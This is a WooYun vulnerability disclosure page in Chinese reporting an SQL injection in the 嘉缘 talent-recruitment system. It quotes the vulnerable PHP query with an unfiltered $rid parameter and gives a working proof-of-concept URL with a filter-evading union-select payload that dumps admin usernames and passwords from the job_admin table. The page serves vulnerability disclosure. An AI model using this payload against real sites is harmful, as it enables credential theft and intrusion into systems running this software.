当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-066711
漏洞标题:
嘉缘人才系统SQL注入漏洞
相关厂商:
嘉缘官网
漏洞作者:
My5t3ry
提交时间:
2014-07-02 16:07
修复时间:
2014-09-30 16:10
公开时间:
2014-09-30 16:10
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-07-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

嘉缘人才系统V2014版20140521 最新版SQL一枚。 这个用户量比phpyun还多,不知道会不会上首页?

详细说明:

厂商URL:
http://www.finereason.com/
漏洞位于/member/person_addresume3.php 68-82行,代码如下:

}else{    
    $trainnum='';
    $result=$db->query("select * from {$cfg['tb_pre']}training where t_pmember='$username' and t_rid=$rid order by t_adddate asc");
    while($rowt=$db->fetch_array($result)){
    	$trainnum.=$rowt['t_id'].',';
    	$train[]=$rowt;
    }
    $smarty->assign('train',$train);
}
$smarty->assign('rid',$rid);
$smarty->assign('trainnum',$trainnum);
$smarty->assign("show",$show);
display('person_addresume3.htm','member');
exit;
?>


漏洞证明:

其中$rid未经过滤带入SQL导致注入。
直接访问
http://192.168.116.128/frcmsnew/member/index.php?m=person_addresume3&rid=@`'` /*!50000union*//*!50000sElect*/1,2,3,4,5,6,7,8,9,concat(a_user,0x7c,a_pass),1,2,3,4 from job_admin%23@`'`
如图:

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 My5t3ry@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝